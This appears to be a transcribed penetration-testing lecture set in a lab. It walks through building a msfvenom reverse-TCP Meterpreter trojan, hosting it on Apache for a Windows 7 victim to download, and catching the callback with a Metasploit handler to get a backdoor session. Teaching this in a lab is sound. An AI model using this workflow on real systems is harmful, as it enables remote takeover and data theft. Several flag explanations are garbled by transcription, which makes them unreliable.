Now, let's move on to the demo. It's a very interesting demo. You're using MetaSploit, which is a penetration testing tool, and you're going to use a demo of using MetaSploit. You're going to try to compromise the security of a particular system. Well, let's discuss the demo before we start executing it. So what we have done here is that we have two virtual machines on VMware Workstation. One is the Kali Linux machine, and the other is a Windows 7 machine. What we are going to do is we are going to use a penetration testing tool called MetaSploit, which is available for you on Kali Linux. And we are going to use a particular payload generator on MetaSploit called MSF Venom. And using MSF Venom, we are going to create a backdoor executable file which will contain a Trojan or a backdoor, and you're going to try to infect that to the Windows machine and see what happens when the victim executes that particular file. Now we are going to keep it at the basic level. We're just going to create the Trojan and then you're going to execute it. In a later lecture or in a later video, we'll see how we can mask that Trojan into a legitimate looking application so that a victim can be fooled by the application that you're going to execute. So let's start with the demo. Alright, so this is the Kali Linux VM and the other machine is a Windows 7 virtual machine. So what we are going to do is, on the Kali Linux machine, we are going to just open up a command prompt, right? It's just regular command prompt, your regular commands. And what we are going to do is we are going to use the MSF Venom payload generator from MetaSploit to create a game.exe file. Now the Trojan will be contained within the game.exe. So the command goes as such: MSF Venom -p for platform. We want it, or rather payload at this point in time. We want the payload to be Windows interpreter reverse _ TCP L host and the IP address for the local host. I'll explain the command once I've typed it. Let's just check what our IP address for this machine is. And we have 192.168.71.133. And that's what you're going to type in here. 192.168.71.133. L port 4444-F exe-a x86. And we want that output in root desktop, and we want it as game.exe. So let's go through the command. The MSF Venom is the initiator command. It invokes the payload generator in MetaSploit. -p is the payload. We want Windows interpreter reverse TCP. So what is a reverse TCP? Here, the interpreter allows us for remote code execution, where we are going to create the payload. We are going to execute the payload at the victims, and the payload will then generate a connection back to us being the hacker's machine, and thus the local host, which is the IP address of this machine, which is the hacker's machine that we're using right now, which is 192.168.71.133. That's why we have typed in the local host. And L port is the local port on which port do we want to listen in, or we want the payload to connect to the local host. So what we're doing is the interpreter allows us remote code execution. We create the game.exe, we execute it at the victim's end. It is pre-coded to connect to a local host. The IP address is coded over there to a particular port, which in this case is 4444. You can put in any port number you want. Just ensure that the port is going to be free and it is not a regularly used port. Otherwise, you're going to get problems over there. So at this point in time, we're going to keep it as 4444. -F stands for function. We want an executable file. -A stands for the architecture. Here, the architecture is 886, which is x86, which is 32-bit. And we are going to export it, and we are going to host it, or we are going to create the file on root desktop. And we're logged in as root, as you can see at the prompt. So when I press enter, I should see a game.exe popping up right about here on my desktop, if the command is correct, which it should be, and that's game.exe. Wait for it to be compiled properly. So there you can see platform Windows for payload, no encoder, payload size 333 bytes, and final size of executable file is 73,802 bytes. So now we have created game.exe. Now we are not going to convert this into, or we are not going to merge this into a malware and things like that. We are going to keep it simple. So to keep it simple, what I'm going to do is, as a hacker, I'm going to host this on a server, which is going to be on this same machine, right? So when we say we want to host on Apache server, the server is hosted in a directory called /var/www. So let's go there. Present working directory. We can see that you're in root cd var www, and there we are cd html, and that is where our web servers would be. So what we are going to do is we are going to create a directory mkdir shared, right, to an ls, and you can see the shared folder right here. ls-al will give you the list and the attributes, and we can see these attributes. We want to change these attributes, so we are going to use the chmod recursive command, give the permissions as 755 to the folder shared. Since we are in the same directory, we do not need to give the path for shared. Let's just verify it, and you can see the permissions being changed. And now what we are going to do is we are going to change the ownership from root to www-data for the web hosting. So ch own for change ownership, recursive www-data www-data to shared. All right, let's check if that's been done properly. And you can see that earlier it was root, and now it is www-data, right? And so that's the directory that we have created. Let's go back. What we want to do is we want to copy game.exe into this folder. So cp root desktop game.exe var www html shared, and cd shared. Let's see, we have game.exe right there. There it is. And now what we want to do is service apache to start. So essentially what we have done is we have created a directory in the HTML folder to host this file, and we have copied it from our desktop into the shared folder. And I'm going to pause here for a minute. All right, so we have started the service for the Apache 2 server. That means we have started the web server. We have hosted the game.exe on the web server in the shared folder. We have changed the permissions and the ownership for the shared folder. Now we are going to go on to the Windows 7 machine, and we are going to open up the browser and see if the web server is now accessible. So if you remember, the IP address of that machine was 192.168.71.133, and we were in the shared folder. 92.168.71.133 shared, and if this is done properly, we should see the game.exe right here. And once we click on it, it's going to ask us whether we want to save the file. 72.1 KB, we're going to save it, and I'm going to save it on, I think it just saved it here. And now, before we execute it, we're going to go back into Kali Linux, and we are now going to start the listener. Right? So we have created the exploit, we have created the payload rather, we have hosted it onto a web server, which means that when somebody double clicks on it, the machine is going to try to create a reverse connection to our hacker's machine. But our hacker's machine needs to be configured to handle that incoming connection. So we are going to start off with MSF console. Now MSF console is the command which starts up MetaSploit. Right? So we just want to take a minute over here. You can see it's MetaSploit Framework console. It's going to start. It's does take a little bit of a while, and we're just going to wait it out. Let me turn this into full screen. I can see at the bottom left, you're on MSF on the MSF prompt. We are using Metasploit with 1,699 exploits. Now, this is not the completely updated version. The latest one would have around 1,800 exploits, but the one that we want is access in this version. So we are good to go. So we start off with the configuration of Metasploit to listen in onto that particular connection. So we say use exploit multi-handler. And when we say multi is basically something that affects multiple operating systems. And you're going to use that exploit, and you can see it's now opening up the handler which we need to configure. And here we're going to set the payload that it is going to expect, the payload being Windows meter reverse underscore TCP. You can see that the payload has been configured. We are going to say show options, and you'll see it is going to ask us options for the payload, which means the local host, the listen address, and the listen port. Now you can see we have by default given 4444, which is the default port for this exploit within Metasploit. If you want to change, if you have changed the port when you created game.exe, you need to change the port over here as well. And the commands here that says set lhost equals 192.168.71.133. Enter, and I think I did a typo. So there's no equal to, that's it. And you can see now it shows the equal to mark, and we have now set the local host. If you want to set the L port, that's how we do it. We had 4444, and there it is. So if you have changed the port in the game.exe, ensure that you change the port here as well. Show options, and you'll see now the data is populated over here. Lhost, which is the local host, is 192.168.71.133, and L port, the local port, is 4444. We have configured this, and now what we're going to do is we're just going to type in exploit, and now you can see that it has started the reverse TCP handler on 192.168.71.133 on port 4444. So now when the victim, which is Windows 7, executes the file and we say run, at the victim's end, there's nothing that should happen. It's just resolving something. And at the other end, you can see that a MetaSploit session has been opened, and it shows us that from the victim's IP, which is 71.129, on port 49493, we are connected to our machine. So that's the connection that has happened. Press enter and you can see it exits the session. Let's just look at the IP address on Windows to confirm that was the same machine that we had, and that's 129. Right there it is. Let's open up this file again and see what happens. And you can see the second session being opened up right here to a PWD, and you can see that we were connected to that particular website, right? So that's what this Trojans are supposed to do, give us a backdoor entry, and we then are able to connect, and we are able to copy data, and we are able to, basically we have a backdoor, so we can do anything and everything that we want to do.